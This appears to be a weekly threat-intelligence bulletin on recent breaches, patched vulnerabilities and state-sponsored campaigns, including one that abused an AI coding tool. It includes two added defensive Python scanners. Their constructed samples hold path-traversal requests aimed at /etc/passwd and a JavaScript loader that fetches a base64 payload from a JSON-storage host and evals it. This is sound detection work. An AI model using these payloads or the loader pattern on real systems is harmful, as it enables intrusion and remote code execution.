New breaches and ransomware attacks, multiple vulnerabilities fixed, and the latest from the state-sponsored landscape
Cybercrime: attacks on Almaviva, Eurofiber France, Pajemploi and Poltronesofà
A few days after the publication on an underground forum of a leak of approximately 2.3 TB of data linked to Almaviva S.p.A. and to several companies of the Ferrovie dello Stato (FS) Group, the company, a leading Italian Information & Communication Technology provider and technological partner of the FS Group, confirmed that in recent weeks it had identified and isolated a cyberattack on its corporate systems that resulted in the theft of some information. It added that it immediately activated its security and containment procedures and ensured the continuity of critical services.
On 13 November 2025, Eurofiber France detected an incident, limited to the French division, involving the ticketing platform used by the company and its regional brands (Eurafibre, FullSave, Netiwan and Avelia), together with the ATE customer portal of the cloud division Eurofiber Cloud Infra France. The adversary exploited a vulnerability in these platforms and exfiltrated data related to them.
Urssaf, the French public body that collects social security contributions, reported that the Pajemploi service, which serves parents employing domestic childcare workers (licensed childminders and babysitters), suffered a data breach that may have exposed the personal information of roughly 1.2 million workers.
Finally, the Italian company Poltronesofà, which produces and distributes sofas and armchairs, notified its customers (in Italian and French statements) that it suffered a ransomware attack on 27 October 2025. The company reported that unauthorised actors compromised Poltronesofà Group servers, encrypting stored files and rendering hosted virtual machines unavailable. Initial investigations indicate that customer identification and contact data, including name, surname, tax code (codice fiscale), postal address, email and mobile number, may have been involved. No public claim of responsibility has emerged.
Vulnerabilities: 0-days and critical flaws patched
Fortinet’s PSIRT addressed two 0-day vulnerabilities in the FortiWeb web application firewall, tracked as CVE-2025-64446 and CVE-2025-58034. The first is a Relative Path Traversal that could allow an unauthenticated attacker to execute administrative commands on the system through specially crafted HTTP or HTTPS requests; the first reports of in-the-wild exploitation date back to 6 October 2025. The second is an OS Command Injection that could allow an authenticated attacker to execute unauthorised code on the underlying system via crafted HTTP requests or CLI commands. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added both issues to its Known Exploited Vulnerabilities (KEV) catalog.
Google fixed two Chrome vulnerabilities, CVE-2025-13223 and CVE-2025-13224, both classified as Type Confusion in the V8 JavaScript engine. For CVE-2025-13223, the vendor acknowledged awareness of in-the-wild exploitation; according to the National Institute of Standards and Technology (NIST), the flaw may allow a remote adversary to trigger heap corruption through a specially crafted HTML page.
WhatsApp patched CVE-2025-55179 in WhatsApp for iOS, WhatsApp for Mac and WhatsApp Business for iOS. The issue is incomplete validation of “rich response” messages, which could have allowed a user to cause another user’s application to process media content from an arbitrary URL.
Grafana released versions 12.3, 12.2.1, 12.1.3 and 12.0.6 to address a critical vulnerability in the System for Cross-domain Identity Management (SCIM) component of Grafana Enterprise. Tracked as CVE-2025-41115 (CVSS 10.0), the flaw is an Incorrect Privilege Assignment that may enable privilege escalation or user impersonation under certain configurations.
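Detection logic a defender could run over web-server access logs for the vulnerability class described for the first FortiWeb flaw (a relative path traversal delivered in a crafted HTTP request), as an added example that is not part of the original report and is not tied to the actual FortiWeb request pattern, which the report does not describe. It goes slightly beyond the paragraph by also catching double-encoded and backslash variants, and by avoiding false positives on file names that merely contain two dots. The log lines, IP addresses and paths are constructed.

```python
"""Scan web-server access logs for path-traversal attempts (added example)."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample lines in combined log format. IPs, paths and payloads are
# invented for this example and do not reproduce the FortiWeb request pattern.
SAMPLE_LOG = r"""203.0.113.10 - - [06/Oct/2025:10:14:02 +0000] "GET /api/v1/files?name=report.pdf HTTP/1.1" 200 4096 "-" "curl/8.4.0"
203.0.113.10 - - [06/Oct/2025:10:14:05 +0000] "POST /api/v1/files%2F..%2F..%2Fadmin/config HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - - [06/Oct/2025:10:15:11 +0000] "GET /static/img/logo.png HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2025:10:15:12 +0000] "GET /..%252f..%252fetc/passwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
192.0.2.5 - - [06/Oct/2025:10:16:00 +0000] "GET /files/report..pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.5 - - [06/Oct/2025:10:16:03 +0000] "GET /download?file=..\..\win.ini HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalize_target(target: str, max_rounds: int = 3) -> tuple[str, int]:
    """Percent-decode repeatedly (defeats double encoding such as %252f), fold
    backslashes to '/', and collapse duplicate slashes.
    Returns (normalized_target, decode_rounds)."""
    current, rounds = target, 0
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    current = current.replace("\\", "/")
    current = re.sub(r"/{2,}", "/", current)
    return current, rounds


def has_traversal(normalized: str) -> bool:
    """True if any path segment, in the path or in a query-string value, is
    exactly '..'. Segment comparison keeps names like 'report..pdf' clean."""
    path, _, query = normalized.partition("?")
    candidates = [path] + [v for kv in query.split("&") for v in kv.split("=", 1)[1:]]
    return any(seg == ".." for c in candidates for seg in c.split("/"))


def scan_log(text: str) -> list[dict]:
    """Return one finding per request whose normalized target contains traversal."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than silently match
        normalized, rounds = normalize_target(m["target"])
        if has_traversal(normalized):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "method": m["method"],
                "status": int(m["status"]),
                "raw": m["target"],
                "normalized": normalized,
                "decode_rounds": rounds,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['raw']} -> {f['normalized']} "
              f"(status {f['status']}, decoded {f['decode_rounds']}x)")
```

The status code is carried through because a 200 on a traversal request is a much stronger signal than a 404; a real deployment would also normalize `%00` and overlong UTF-8 sequences, which this example leaves out.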
APT: activity from China, North Korea and the Middle East
The Chinese adversary PlushDaemon leveraged a previously unseen implant named EdgeStepper in adversary-in-the-middle attacks that redirect victims’ software-update traffic to attacker-controlled servers. Also China-related, the U.S. AI company Anthropic reported, and subsequently disrupted, a large-scale and largely automated cyber-espionage operation conducted by a Chinese state-sponsored actor tracked as GTG-1002. The activity abused Anthropic’s Claude Code tool to target 30 high-profile organisations, including major tech firms, financial institutions, chemical manufacturers and government agencies, and successfully compromised only a small number of them. The UK’s MI5 issued an alert about attempts by China’s Ministry of State Security (MSS) to recruit individuals with access to sensitive information about the British state, using two seemingly legitimate LinkedIn profiles to approach MPs and political staff.
Moving to North Korea, Lazarus Group’s Contagious Interview campaign is leveraging legitimate JSON storage services, such as JSON Keeper, JSONsilo and npoint[.]io, to host and subsequently distribute malware.
In the Middle East, the Israel National Digital Agency (INDA) uncovered an ongoing and sophisticated espionage operation, dubbed SpearSpecter, by the Iranian APT Charming Kitten. The operation systematically targeted senior defence and government officials through personalised social engineering, including invitations to prestigious conferences or the arrangement of important meetings. The activity also extended to the targets’ family members, broadening the attack surface and increasing pressure on the primary victims. The TTPs include new modules of the TAMECAT backdoor, a multichannel C2 infrastructure leveraging Telegram and Discord, payload staging through WebDAV infrastructure and creative abuse of native Windows features.
Also in the Middle East, new elements emerged regarding the TTPs of the espionage campaign conducted by the Iranian actor Tortoiseshell (UNC1549), first tracked in mid-2024, targeting the aerospace, aviation and defence sectors in the region.
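A watchlist check a defender could run over JavaScript or npm package sources for the JSON storage hosts named in the Contagious Interview paragraph above, as an added example that is not part of the original report. npoint[.]io is refanged from the report’s defanged form; the jsonkeeper.com and jsonsilo.com domains are assumptions, since the report names the services but not their domains. The JavaScript sample is constructed. The example goes a little beyond the paragraph by matching on a dot boundary (so look-alike hosts are not flagged) and by re-joining URLs split across concatenated string literals.

```python
"""Flag references to JSON-storage hosts abused for payload hosting (added example)."""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Watchlist kept defanged, as threat-intel feeds usually deliver it. npoint[.]io
# comes from the report; the jsonkeeper and jsonsilo domains are assumptions
# (the report names the services, not their domains).
WATCHLIST_DEFANGED = ["jsonkeeper[.]com", "jsonsilo[.]com", "npoint[.]io"]


def refang(indicator: str) -> str:
    """Turn defanged notation ('[.]', 'hxxp') back into a usable host or URL."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


WATCHLIST = {refang(h) for h in WATCHLIST_DEFANGED}

# Absolute URLs inside source text; stops at whitespace, quotes, backticks, brackets.
URL_RE = re.compile(r"""https?://[^\s'"`<>)]+""")
# Concatenation of two string literals, e.g. 'https://www.json' + 'keeper.com/b/X'.
JOIN_RE = re.compile(r"""['"]\s*\+\s*['"]""")

# Constructed sample: a package entry point that pulls a base64 blob from a
# JSON-storage host and evaluates it. Not real malware, not from the report.
SAMPLE_JS = r'''
const axios = require("axios");
const CDN = "https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js";
const CONFIG_URL = "https://api.npoint.io/0123456789abcdef0123";
const BACKUP_URL = 'https://www.json' + 'keeper.com/b/ABCD';
const DECOY = "https://npoint.io.example.com/status";
async function init() {
  const { data } = await axios.get(CONFIG_URL);
  eval(Buffer.from(data.p, "base64").toString());
}
'''


def host_matches(host: str, watchlist: set[str]) -> str | None:
    """Return the watchlist entry that `host` equals or is a subdomain of.
    Suffix matching on a dot boundary keeps npoint.io.example.com clean."""
    host = host.lower().rstrip(".")
    for entry in watchlist:
        if host == entry or host.endswith("." + entry):
            return entry
    return None


def scan_source(text: str, watchlist: set[str] = WATCHLIST) -> list[dict]:
    """Return one hit per URL whose host is on the watchlist, with its line number."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        joined = JOIN_RE.sub("", line)  # defeat simple splitting of URLs into literals
        for m in URL_RE.finditer(joined):
            url = m.group(0)
            hostname = urlsplit(url).hostname or ""
            matched = host_matches(hostname, watchlist)
            if matched:
                hits.append({"line": lineno, "url": url, "host": hostname, "matched": matched})
    return hits


if __name__ == "__main__":
    for h in scan_source(SAMPLE_JS):
        print(f"line {h['line']}: {h['url']} (host {h['host']} matches {h['matched']})")
```

A hit on these hosts is not proof of compromise on its own, since the services are legitimate; the useful follow-up is to look at what the fetched content feeds into (here an `eval` of decoded data), which is the pattern that turns a benign JSON fetch into a loader.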
Weekly Threats Report is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.
The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.
Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with actionable information to anticipate attacks and understand their impact, and acts as a reliable partner in the event of a cyber incident.
